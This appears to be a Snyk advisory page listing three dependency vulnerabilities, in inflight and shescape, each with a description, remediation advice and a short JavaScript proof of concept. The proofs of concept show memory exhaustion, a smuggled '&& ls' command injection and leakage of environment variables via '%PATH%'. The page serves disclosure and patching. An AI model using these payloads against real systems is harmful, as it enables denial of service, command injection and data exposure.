Find, fix and prevent vulnerabilities in your code.
medium severity
- Vulnerable module: inflight
- Introduced through: glob@7.2.3
Detailed paths
-
Introduced through: snyk-mvn-plugin@snyk/snyk-mvn-plugin#13557c587050fa5c70887005313d542b61d19ea7 › glob@7.2.3 › inflight@1.0.6
Overview
Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres
function due to improperly deleting keys from the reqs
object after execution of callbacks. This behavior causes the keys to remain in the reqs
object, which leads to resource exhaustion.
Exploiting this vulnerability results in crashing the node
process or in the application crash.
Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.
To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.
PoC
const inflight = require('inflight');
function testInflight() {
let i = 0;
function scheduleNext() {
let key = `key-${i++}`;
const callback = () => {
};
for (let j = 0; j < 1000000; j++) {
inflight(key, callback);
}
setImmediate(scheduleNext);
}
if (i % 100 === 0) {
console.log(process.memoryUsage());
}
scheduleNext();
}
testInflight();
Remediation
There is no fixed version for inflight
.
References
medium severity
- Vulnerable module: shescape
- Introduced through: shescape@1.6.1
Detailed paths
-
Introduced through: snyk-mvn-plugin@snyk/snyk-mvn-plugin#13557c587050fa5c70887005313d542b61d19ea7 › shescape@1.6.1Remediation: Upgrade to shescape@1.7.4.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Improper Neutralization due to possible escaping the wrong shell, thus allowing attackers to bypass protections. Note: you are only vulnerable if you are using this package on Windows in a threaded context.
PoC
// vulnerable.js
import { exec } from "node:child_process";
import { Worker, isMainThread } from 'node:worker_threads';
import * as shescape from "shescape";
if (isMainThread) {
// 1. Something like a worker thread must be used. The reason being that they
// unexpectedly change environment variable names on Windows.
new Worker("./vulnerable.js");
} else {
// 2. Example configuration that's problematic. In this setup example the
// expected default system shell is CMD. We configure the use of PowerShell.
// Shescape will fail to look up PowerShell and default to escaping for CMD
// instead, resulting in the vulnerability.
const options = {
shell: "powershell",
interpolation: true,
};
// 3. Using shescape to protect against attacks, this is correct.
const escaped = shescape.escape("&& ls", options);
// 4. Invoking a command with the escaped user input, this is vulnerable in
// this case.
exec(`echo Hello ${escaped}`, options, (error, stdout) => {
if (error) {
console.error(`An error occurred: ${error}`);
} else {
console.log(stdout);
}
});
}
Remediation
Upgrade shescape
to version 1.7.4 or higher.
References
medium severity
- Vulnerable module: shescape
- Introduced through: shescape@1.6.1
Detailed paths
-
Introduced through: snyk-mvn-plugin@snyk/snyk-mvn-plugin#13557c587050fa5c70887005313d542b61d19ea7 › shescape@1.6.1Remediation: Upgrade to shescape@1.7.1.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Information Exposure such that an attacker may be able to get read-only access to environment variables.
Note:
This impact users of Shescape:
- On Windows using the Windows Command Prompt (i.e.
cmd.exe
), and - Using
quote
/quoteAll
orescape
/escapeAll
with theinterpolation
option set totrue
.
Workaround
Users who are unable to upgrade to the fixed version can remove all instances of %
from user input, either before or after using Shescape.
PoC
import * as cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "cmd.exe",
// Or
shell: undefined, // Only if the default shell is CMD
// And
interpolation: true, // Only applies to `escape` and `escapeAll` usage
}
// 2. Attack (one of many)
const payload = "%PATH%";
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable
Remediation
Upgrade shescape
to version 1.7.1 or higher.